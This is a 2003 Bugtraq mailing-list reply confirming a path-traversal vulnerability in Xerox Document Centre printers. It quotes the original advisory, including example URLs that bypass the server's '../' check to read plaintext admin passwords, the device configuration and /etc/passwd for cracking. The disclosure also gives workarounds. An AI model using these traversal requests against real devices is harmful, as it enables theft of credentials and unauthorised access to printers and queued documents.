Bugtraq mailing list archives
Re: Security bug in Xerox Document Centre
From: brandon pierce <brandonp () insynclh com>
Date: 20 Dec 2003 00:02:06 -0000
In-Reply-To: <20031219141657.A1147 () shiva cps unizar es> Just tested this out on a few different models of Xerox multifunction devices of ours as well, and all three were vulnerable. Following systems apply: Document Centre 440DC Document Centre 480DC Document Centre 425ST
TECHNICAL INFO =============================================================================== Vulnerable systems - -------------------------------------------------------------- Xerox Document Centre 470, 255ST and maybe others. Software : Xerox_MicroServer Version : Xerox11 0.19.5.509 OS : LynxOS:E2.1_SMP.063.1:02/13/2003 Impact - ----------------------------------------- Remote access to files. Access to plaintext passwords for the http administration interface. Access to DES passwords for the operating system. Read-write access to http users and passwords Details - -------------------------------------------------------------- Web server software (self-reports as "Xerox_MicroServer/Xerox11") for Xerox hardware will return a binary dump of directories when the requested URL ends with "/.." or "/."; so you can build easily the directory/file tree from document root and get every file. At first, you can't get back past document root, since httpd seems to reject "../" if it would climb back too much: GET /../.. -> "The request had invalid syntax." But it does accept "../": GET /assist/.. -> OK So maybe it just counts "../" groups and compares the count to the total number of "/" ? Let's try: GET /assist/////.././../../. -> OK Examples: - http://xerox_dc_470.example.com/.. 00 00 00 00 45 00 0c 00 01 2e 00 00 00 00 00 00 43 ...E...........C 10 00 0c 00 02 2e 2e 00 00 00 00 00 46 00 10 00 06 ...........F.... 20 63 6f 6e 66 69 67 00 00 00 00 00 48 00 10 00 06 config.....H.... 30 68 74 64 6f 63 73 00 00 00 00 02 26 00 10 00 04 htdocs.....&.... 40 6a 6f 62 73 00 00 00 00 00 00 02 29 01 b8 00 04 jobs.......).... 50 6c 61 6e 67 00 00 00 00 00 00 00 00 00 00 00 00 lang............ 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ - http://xerox_dc_470.example.com////../../data/config/microsrv.cfg and you get full configuration, including plain text passwords. - http://xerox_dc_470.example.com////////../../../../../../etc/passwd and you get a passwd file to run crack on Even without having to use ".." you can get the plain text passwords for the HTTP interface using http://xerox_dc_470.example.com/srvadmin/usersecure.dhtml From that page, you can even create new users; when you press "Apply new settings" button prompts for admin password (the same you just have read in that same page) Probably you could use this to steal documents from the printer queue, but I haven't verified this. Note: to test this vulnerability do not use any "smart" http client which will rewrite the URL internally to suppress '../' parts. Workaround - --------------------------------------------------------------------- - Disable http interface. - Restrict access permissions to trusted hosts =============================================================================== -- finger spd () shiva cps unizar es for PGP / .mailcap tip of the day: / La vida es una carcel application/ms-tnef; cat '%s' > /dev/null / con las puertas abiertas text/x-vcard; cat '%s' > /dev/null / (A. Calamaro)
Current thread:
- Security bug in Xerox Document Centre J.A. Gutierrez (Dec 19)
- <Possible follow-ups>
- Re: Security bug in Xerox Document Centre brandon pierce (Dec 20)